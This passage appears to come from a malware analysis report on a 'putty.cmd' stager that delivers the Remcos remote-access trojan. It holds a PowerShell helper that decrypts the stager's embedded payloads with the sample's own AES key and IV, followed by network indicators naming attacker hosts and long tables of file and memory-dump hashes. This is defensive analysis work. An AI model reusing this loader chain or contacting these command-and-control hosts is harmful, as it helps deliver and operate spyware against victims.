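$KeyB64 = '6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q='   # 32 bytes -> AES-256
$IvB64  = '/1orvBajL3CcAQUeEJe3RA=='                       # 16 bytes

function Unprotect-StagerBlob {
    # Mirrors HtjiD (AES decrypt) followed by mcKuT (GZip inflate) from the stager.
    param([byte[]]$CipherText)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = [Convert]::FromBase64String($KeyB64)
        $aes.IV      = [Convert]::FromBase64String($IvB64)
        $dec = $aes.CreateDecryptor()
        try { $plain = $dec.TransformFinalBlock($CipherText, 0, $CipherText.Length) }
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }

    $in  = New-Object System.IO.MemoryStream(,$plain)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out) } finally { $gz.Dispose(); $in.Dispose() }
    $bytes = $out.ToArray(); $out.Dispose()
    return ,$bytes
}

if (-not (Test-Path $OutDir)) { New-Item -ItemType Directory -Path $OutDir | Out-Null }

# The stager indexes the file's lines with ElementAt(5) and ElementAt(6) (0-based), i.e. the
# 6th and 7th lines of putty.cmd, and discards the first two characters of each (Substring(2)),
# presumably a '::' cmd comment marker that keeps the lines inert when cmd.exe runs the file.
$lines = [System.IO.File]::ReadAllLines($CmdPath)
$slots = @(
    @{ Index = 6; Name = 'stage_a_loaded_first.bin' },   # $YFqfz: Assembly.Load'ed first
    @{ Index = 5; Name = 'stage_b_loaded_second.bin' }   # $kqnRx: loaded second
)

foreach ($s in $slots) {
    if ($lines.Count -le $s.Index) { throw "putty.cmd has only $($lines.Count) lines; expected a payload at index $($s.Index)" }
    $raw     = $lines[$s.Index].Substring(2)
    $payload = Unprotect-StagerBlob ([Convert]::FromBase64String($raw))
    $path    = Join-Path $OutDir $s.Name
    [System.IO.File]::WriteAllBytes($path, $payload)

    # The stager feeds these bytes to Assembly.Load, so a PE ('MZ') header is the expected result;
    # anything else means the key, IV or line offsets differ from this sample.
    $isPe = ($payload.Length -ge 2 -and $payload[0] -eq 0x4D -and $payload[1] -eq 0x5A)
    $sha  = (Get-FileHash -Algorithm SHA256 -Path $path).Hash
    '{0,-28} {1,8} bytes  PE={2,-5} SHA256={3}' -f $s.Name, $payload.Length, $isPe, $sha
}
```

Run it inside an analysis VM with the putty.cmd recovered from the host (its hashes are in the Files section below), for example `.\Extract-PuttyCmd.ps1 -CmdPath .\putty.cmd`. A wrong key or IV surfaces as a padding exception from TransformFinalBlock and a wrong line offset as a base64 FormatException, so each failure mode points at the part of the chain that differs. The extracted blobs are .NET assemblies that were never written to disk during the detonation, which is why the report lists only memory dumps and the CLR UsageLogs entries for powershell.exe rather than a dropped executable.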
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 188.114.97.2:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hostbeast.xyz | udp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| US | 8.8.8.8:53 | 202.110.86.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.22.78.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| US | 8.8.8.8:53 | 218.110.86.104.in-addr.arpa | udp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| SE | 80.78.22.161:80 | hostbeast.xyz | tcp |
| US | 8.8.8.8:53 | bignight.net | udp |
| UA | 194.147.140.208:3363 | bignight.net | tcp |
| US | 8.8.8.8:53 | 208.140.147.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
memory/2824-10-0x0000028FE09D0000-0x0000028FE09F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0pmc4ixn.uhp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2824-11-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp
memory/2824-12-0x0000028FE07F0000-0x0000028FE0800000-memory.dmp
memory/2824-13-0x0000028FE07F0000-0x0000028FE0800000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tempScript.ps1
| MD5 | 1449878eb9e0b72365906e10545b3a63 |
| SHA1 | 27c596b59b6ff8024ba1e47a74a2d11a018315aa |
| SHA256 | dcbee82699901eebd224bf5d350ecd713c947da38e7d4a1dc2be04744dd035c9 |
| SHA512 | ed78aa6441f6f5ea160257b19ed1515eb29bc6a05d6bfe887f8776f101028e5cc629387f51223a69876f459fe6af6b472ac595556e952e802746fc0bce329fad |
C:\Users\Admin\putty.cmd
| MD5 | fe0b5dd497d401707b5b5cf106ea3d2d |
| SHA1 | cb08bbba87f00576e4ba0bcee4c35fc71fb7306b |
| SHA256 | 76b469018e58f53c71dcc049afa38b04854c17e0116d2294a6542cb261a2358f |
| SHA512 | 3e4b3f317f6cdc05e34f2b7e65053435f17c71ca79df9c962fac4f19ff8214f0d0df68190bfedbf7fa8e0dbacb9211c3877f5542d1b0bd8e3abdd62439c95521 |
memory/2824-20-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
memory/5052-23-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp
memory/5052-30-0x000001B674BC0000-0x000001B674BD0000-memory.dmp
memory/5052-31-0x000001B674BC0000-0x000001B674BD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 70595b5937369a2592a524db67e208d3 |
| SHA1 | d989b934d9388104189f365694e794835aa6f52f |
| SHA256 | be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8 |
| SHA512 | edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5 |
memory/5100-36-0x0000000004780000-0x00000000047B6000-memory.dmp
memory/5100-37-0x0000000074C20000-0x00000000753D0000-memory.dmp
memory/5100-38-0x0000000002380000-0x0000000002390000-memory.dmp
memory/5100-41-0x0000000004DF0000-0x0000000005418000-memory.dmp
memory/5100-40-0x0000000002380000-0x0000000002390000-memory.dmp
memory/5100-42-0x0000000004D20000-0x0000000004D42000-memory.dmp
memory/5100-43-0x0000000005420000-0x0000000005486000-memory.dmp
memory/5100-44-0x0000000005590000-0x00000000055F6000-memory.dmp
memory/5100-54-0x00000000056C0000-0x0000000005A14000-memory.dmp
memory/5100-55-0x0000000005C10000-0x0000000005C2E000-memory.dmp
memory/5100-56-0x0000000005C60000-0x0000000005CAC000-memory.dmp
memory/5100-57-0x0000000006D50000-0x0000000006D94000-memory.dmp
memory/5100-58-0x0000000006F10000-0x0000000006F86000-memory.dmp
memory/5100-59-0x0000000007610000-0x0000000007C8A000-memory.dmp
memory/5100-60-0x0000000006FB0000-0x0000000006FCA000-memory.dmp
memory/5052-63-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp
memory/1724-76-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp
memory/1724-77-0x000001E7E9B60000-0x000001E7E9B70000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 04a8c09199bb86739f38fbcf9ce30a0f |
| SHA1 | 3668880a67ade87c97393bc5b274bd5fffeb31c3 |
| SHA256 | c8278d1aa4e3b462b1a70de2c18534ec2d6dc9aff5865f3f37138e5d729d8356 |
| SHA512 | 3205da818ab1b4dea09c063acecbd862c21428f515dd1dace41135e6c5b5e4b9f2022b33752c605a45d201807709c897960030dc5378a58a6dd1201b6feddcd4 |
memory/1724-78-0x000001E7E9B60000-0x000001E7E9B70000-memory.dmp
memory/3636-80-0x0000000005430000-0x0000000005440000-memory.dmp
memory/3636-79-0x0000000005430000-0x0000000005440000-memory.dmp
memory/3636-81-0x0000000074C20000-0x00000000753D0000-memory.dmp
memory/1112-92-0x0000000074C20000-0x00000000753D0000-memory.dmp
memory/1112-93-0x0000000005020000-0x0000000005030000-memory.dmp
memory/1112-94-0x0000000005020000-0x0000000005030000-memory.dmp
memory/3632-104-0x0000000074C20000-0x00000000753D0000-memory.dmp
memory/3632-105-0x0000000004EB0000-0x0000000004EC0000-memory.dmp
memory/3632-106-0x0000000004EB0000-0x0000000004EC0000-memory.dmp
memory/1112-118-0x0000000074C20000-0x00000000753D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | e90a51d3280c84198517c5118aa4a89e |
| SHA1 | f44d8fb368608e5f36f07b93633805775691edfd |
| SHA256 | 113ba962e17e8bd4dd2984397694c21062ad45c4ffc959f3055448f7298f77eb |
| SHA512 | b56895dd1794a991f18b29418decbc4380e010abc23500f89d84a2df7bf771b082f366213d61f4328a231a390771aa1623180f8e071ee8edb998148ac5254394 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 928d36ad618a369ffebf44885d07cf81 |
| SHA1 | edf5a353a919c1873af8e6a0dfafa4c38c626975 |
| SHA256 | d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea |
| SHA512 | 4ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a |
memory/3632-122-0x0000000074C20000-0x00000000753D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | d81f7e4ad172f5c9f3c81a3571830a79 |
| SHA1 | e5acfc0e153d86c35e8e765951499aa05dad4303 |
| SHA256 | 0ad988aeda0d9b478ac102493176fe0b9cc8d5c2c03f0b0225ffcf6f9a1125da |
| SHA512 | 7a0a702a71440ede9460e1c1e0140d13f6dde9148a42c76218c98f43cb545e27a85f708df483aa8cd657548b427c07540be08585e849436bc763f7c5a54c8666 |
memory/5100-125-0x0000000074C20000-0x00000000753D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 48b228d2308ff78543df42c7645fbee6 |
| SHA1 | 69663117c2bdfeb22e74134f5e92d50628bc7a40 |
| SHA256 | 36db9c13532927a1751243c3eeb060592a679b0a57211e9251bd58445e64d26d |
| SHA512 | 67bce8abf972c3f857e6a5db7bda9a579beea82d91e513da9111f0dbddaa8e77046b04ba2324add75c765fd54de3fe5de8fe1243b827d5c68a7023e21f83c50a |
memory/3636-128-0x0000000074C20000-0x00000000753D0000-memory.dmp
memory/1724-131-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp
memory/1888-134-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp
memory/1888-135-0x0000021584050000-0x0000021584060000-memory.dmp
memory/1888-141-0x0000021584050000-0x0000021584060000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | de3785474ec9f2958bf5ad188157c187 |
| SHA1 | d428d28d65ab367cadfa8e92eca5936eb13a8df5 |
| SHA256 | 456bd22cc0d6f4598966d5cb7b58722b02a0bada4848f973ddfe824b3da09c1f |
| SHA512 | 8b9804fff643f4e64510f15aaa2a1f27a24f84bb7511b043c86359ed9bcc19e29baadce4458c753f1661295e2937256eb4a7bccfaf590cd031abcd071ce258ed |
memory/1572-147-0x00000000052C0000-0x00000000052D0000-memory.dmp
memory/1572-148-0x0000000074C20000-0x00000000753D0000-memory.dmp
memory/1572-158-0x0000000006330000-0x0000000006684000-memory.dmp
memory/4272-161-0x0000000074C20000-0x00000000753D0000-memory.dmp
memory/4272-162-0x0000000002E70000-0x0000000002E80000-memory.dmp
memory/4272-163-0x0000000002E70000-0x0000000002E80000-memory.dmp
memory/4272-174-0x0000000074C20000-0x00000000753D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | a0aaec256da24cd63a9acc43afe6502e |
| SHA1 | 82f36283a7296e8e0812439e925f4538cce5ddd3 |
| SHA256 | 553cf00f9b04b012c825732e7df08fa6ce4cc45fc5db76f399b9f8a39c60626e |
| SHA512 | 300ed5416a7a8138d0e0d2115cc0dd37ae66ad3c418a44692c65cb8e27c4d4c68a8971e28e9a766d1696f001756bd11b26b009e6d20bd168fc4ec51e9e8f8f3d |
memory/1572-177-0x0000000074C20000-0x00000000753D0000-memory.dmp
memory/1888-180-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp
memory/4980-183-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp
memory/4980-184-0x00000264DC750000-0x00000264DC760000-memory.dmp
memory/4980-185-0x00000264DC750000-0x00000264DC760000-memory.dmp
memory/4836-195-0x0000000074C20000-0x00000000753D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c03e0febf2c9a23481c8df79ea38982b |
| SHA1 | c0c5e9036f839fc9cdf8d2466b271a41d7549b8b |
| SHA256 | 4cc1454534f596eda878a64f26cad2761e8f4dfa60e958e6da15186df8186351 |
| SHA512 | e0940ad8cadcd4626e3c4769e91c31a7b6b97d1d340ddf1570ba9ff25a9b3a09ec3474618b81ffd7276efa8eacb6db1da1f1c164779bc2193a2c58d98241868c |
memory/4836-199-0x0000000005BB0000-0x0000000005F04000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 19b830d633135c6b1168755d5f79e1e5 |
| SHA1 | 0ff875405233f0e46085d5c164c832d9d70ae485 |
| SHA256 | c2dfff31aa109a72b4b950f949a56a4754d4f66a29a9872f345cb81b2a777073 |
| SHA512 | a100239571569cebae7076241f2824eb7bbf28d87be9bb59375292792a6134d3e391ed1f3f1dcb4799480a2d3073b82906cb16eb43960ada1f3d41004e2fdd7e |
memory/4400-209-0x0000000074C20000-0x00000000753D0000-memory.dmp
memory/4400-210-0x00000000046B0000-0x00000000046C0000-memory.dmp
memory/4400-211-0x00000000046B0000-0x00000000046C0000-memory.dmp
memory/4400-222-0x0000000074C20000-0x00000000753D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | f19d51eb144911c746d88bffcd59cd07 |
| SHA1 | d1c82462aea7a5c373a1de7afc81f84cef0ec3ba |
| SHA256 | b2f3d1af662ffed2da99163d94e38a7283016a2e18aa5c75648a9cd1d2d8dba9 |
| SHA512 | b9959c1db39462f3a92c6679950001f53cbaf164fed284b2bd6f53a773ca76b57514566a41ab88f328cfcb589eee0f12262e01483db70cae2d7d1b5d0ed70a7e |
memory/4836-225-0x0000000074C20000-0x00000000753D0000-memory.dmp
memory/4980-228-0x00007FFF92DA0000-0x00007FFF93861000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f7d6b7f3879853a15d7b33686ce21275 |
| SHA1 | bf7a40049fda2a4b3fd5db593655c0c8ace529cd |
| SHA256 | c3206f235e90c65decd21d0bae16dd14ce5859011f75636152792d5e74544803 |
| SHA512 | 004369b7433d82dc2aa1c1336d30c4ee491b14687302cbd5ae09b367c167a956a9de72a703a8e5c20779750256270201dff25638efd458307c66117c8ca52e67 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | b37810e098a3ffe7abbf707c05ff2f77 |
| SHA1 | e097b4ce61605f6d9d133d96bbdd756617c29cf1 |
| SHA256 | ba36a4f241afde37e6cef559150ab8d1a8ea70861dd3bf51bf8d893c5f7661c4 |
| SHA512 | 151bf3f372b4abc7af52646bb16c0aacc24d79388d4e13e613ce989534c8e9d578a092dc1d886a6e0c8d69d6cd1aeeea020a91ead80b689204de47aad59b6953 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bb399bb581675c7a4ea8e6d1b684ea93 |
| SHA1 | 3b3b187d6d27ba0cf0767296b1d4c442cd121dce |
| SHA256 | 6f8ac41385bb99c3fcba58c015a4c2a6c096d0b6a25bbea4dd7375c3e2b64e83 |
| SHA512 | dafecabbcb9205438f2ef3d8b0d772e47e228921ee00ee07521847c380b47ed31897b85f383eab76b82fe72098f79e73f6fb5877ac5e775b2b40e8387fca98d3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 5c4eddc4acf40d367d38e6b5bfbbe341 |
| SHA1 | 135a82173699b95fad461b0f4c43e8d94b2eae4b |
| SHA256 | fbf701b8dc6afc4b143a0dd901e0adaf5e925e4d1e6927f2ab41244d27b3999a |
| SHA512 | d80dbe283f09e755263a9593356a8ec847a5bc3608754cc3f03fe21ce361bc6a2634b6de9c0ee189d9f1e60940ffa7641b4573ff9ce22e10bf6693d556f8c74c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 304d8fa4c0574321e877b436b36470a5 |
| SHA1 | 14d1f8f7652cc8a87ae062bb3c442b8f651f9c58 |
| SHA256 | 50e7236d5e2700c7718c17c8dbb9835ed1ee3faf99291ad22cd275f283eb6d19 |
| SHA512 | 6992d7039088cc86cbf03f9eb9667286465458a6a47f45a4ea50ffae72f5bfd6644b067dbafa7b21e321ce71067976b9a88400f13dc1978dae29a837060bab81 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0d77515bd8002f34051b06cf7c379b56 |
| SHA1 | a3db7d58b4af15ef3ad5992ca7e7652e8b46c659 |
| SHA256 | 04f6fcccfe4ebab90e80137d89b4eb285c90f2c09e502335d87b00918bf5189e |
| SHA512 | 3b5f5513d51b5f7718d28819b70bafa76d46806c96ef00692aa571dc1dfbc280e782b5464b16bb3e99682b29c9434c81fa8b2461bde0070af2a5811c1c400037 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 3d8bae6c7833298afcf2493cef98d11c |
| SHA1 | b1cae6415fec1fa46d740032e06d66d476a2eaf7 |
| SHA256 | 71e2b24fa38a2d40563dae0e20b682e26e1e099b26854478da45d0463444b21e |
| SHA512 | 3c3aa023f2dbf41e647dbb4d0f71476aa9fe602d193bd0f17e3bba140f949b0b7cf0996771ca370a888dadea5031111281ad008d6ee64704c9a1fbe5d76e4b75 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 7ff9d11f161c8334447e670890cbcc24 |
| SHA1 | 19e77604a610036c77b536b66ef55e58ccc6fca4 |
| SHA256 | 66bc987bc355ba7aee4cdf853064e1aea9f2c636b75261f880585495ca6bb66a |
| SHA512 | 8f9a44f193b4f872305d48d4b9dee06162b2b0ddec6740e256e5d7010907aa2448c7acc4d20c2d3a839ff586d4221cc9c9db6f9e3efd84a2b16bafd92b4358ca |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 12b28667863bc9412328ae3de35cd959 |
| SHA1 | 144ea035cbcc7ac2e63077f49bd7dbe1b6e0edf9 |
| SHA256 | afd6d5b908baad6dd246a5c7a6507634c34936220b9452b955e22852816c0761 |
| SHA512 | 6e3da27bb8237d0f8b98d14aabfc32f3e21c184a9836ebf18d6e9fec66b9e2618316475e652b94336211fcf8438e43b40175df164de06109a021f2267844fc15 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 1e73801d2f8a0b4de70d64ab96b5c839 |
| SHA1 | c5eea4f68bf9329e3c4ee8d6944ce1840dde01cd |
| SHA256 | e27f828f2c70942110807e96013706b8c24a0ec6a69769fa0fe843c933effe95 |
| SHA512 | 55d62e1d5d05b1fa4eeaefcfe9b45594e36d3bdab1da01ba897cc00de2d5ff83d2fb7133f7c1f61d432a70a9c0d6e87f9ff691dc7c4f23482a3ab813f0798fba |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 1e50e85568d266ce227c758e9b134a9f |
| SHA1 | a196f1b15e74a1a8af3919862d059cccac8933e4 |
| SHA256 | 9d901b25e2688e399c40eb87082b7eec61e0770ad461c99bf41bf07401802614 |
| SHA512 | 072d6593c9ddcedd7a83690045648c75caaf96e5e15ce135514bb1dd64c55d2a6113b2a159970f4a1020514eb3866ce0e25d4196d4c1b71ee987cea411c1cb4a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 26f41cf94fcea0c66fb3304ed9b4a66c |
| SHA1 | e8448d7cb51e93768a3b57d96ab290b2825ba02a |
| SHA256 | c889ab605b2cde9ba5ec49b9d499f2e34c0a63b1861d032a78bfebd215cac289 |
| SHA512 | ebccaad97172385c03dda2269a374277e70d04fb450487af6b241aa1d785ef583432b25534021a29b322b8e9396c68553d4b9b27c8b5713f0c070ce19aa83cda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | f3e5b6a256cca5e06887da6a0024b7f3 |
| SHA1 | 995f4854bb2a4fb3fb3cc254e1e1e8fb0b0fa429 |
| SHA256 | 6f88382fa3647a796674189ed838ce6d826c604e723365112a0a03af51738e85 |
| SHA512 | 392f6165a286242331d99b0514e3fe0ca203ec1e00ad491892ae83397737359e471cedb0af9545f6877ba95c9d03dbdf359130bf2290fbb4d6681793b2fb9690 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f1c10b5a8a1723292d7f2497fc0ea413 |
| SHA1 | d5008d39de67668cacf974188b9b2a03063a31c5 |
| SHA256 | 431bb1eb5470b7a2506e73760b9899a72889500004847f2c4d54fdea34562a73 |
| SHA512 | 7f1e237afc313b3cba6d1b612e28915398f2f82e915fc8bb751890a46b19842bfddc894674980f35d85d6003ba8d20798471b1d5e194a2fa95bb99c0a9a9fc00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 38cb1155f388a9fb73cfa377b307550b |
| SHA1 | ce936aad63302804fa4ceb91c175d4877bc92e0c |
| SHA256 | 43474e9fc0ad7971c1c5204ec256808bbb034c34e0924c4ad4a0b411f9573083 |
| SHA512 | cf82a398c793c1e975529d621ae90949d10e946971feefedb53a8e65f7ff5dfdb39d8d01f4460f10dcff2c88834e8c132009a54e93abcbbbcfb0deb1fd48311b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | c49ea496cf22852766d021d6c0bf8eec |
| SHA1 | 763ee2f93218803f232897d09f9486417e384f7a |
| SHA256 | db339ea03b7d20b201903b5f2d743f6615d4b489f1354a29d998e4baa95f0e2f |
| SHA512 | 5fc7177c17c15cfbb3d0754050f5856a725b6133df9d4e07e41e48c90451f308818cbfc4fcc2ee15a3ba899b9e9eb11b27dc6dc70c88be85823078918a980871 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 3ff4baa446f429ab3005897d1f7a5ef4 |
| SHA1 | d75e837ff7487263c7e3c817d405816bee2011da |
| SHA256 | a535429661869f469191186c7808def915d45dac57d4597c3f768a4776df417b |
| SHA512 | 0b7de45b5b82667268493e6f02f0218b2acdb0019404ac24e6fa2855ad8800c6ad3fd703e7ea30942560b82ff1233b60287ef587acff7c1fceb814830fca60cc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d012c952bd400ef133c6756b4518501d |
| SHA1 | 8588b444ccc9f3bdbb31d44c2d34621855f827b9 |
| SHA256 | eec8dca20761fcb2f35e36a809f31bdca5a9cdde97cc58f141407f150611edb3 |
| SHA512 | 9e8b6fc3b15d913dec1af380a91779fe04ba405492465c689ca874c1909bfd3d4d3eed2c67e85120ab3c9c82402638f43534c8755687e6a2cf8d831619c5b9f2 |
memory/3600-881-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\remcos\logs.dat
| MD5 | ae66e806d1cac2989b345f48ca269763 |
| SHA1 | 34ae4b3c126f8cfe9ff3e9a9a81f2d5c6305fe21 |
| SHA256 | ff4719815d1fb9c41c99c5491cbed481a51ff9fb036b79c2ea841e7d659f8b18 |
| SHA512 | 86bd67a1f76d9e394b6f0fd4d2bf08370dbfce266ae14737138257f6fa4b79b5a2075d37c8f7b057d96bb14ea2a42efd82a4527c7341d655d8b69f8dc37cdae8 |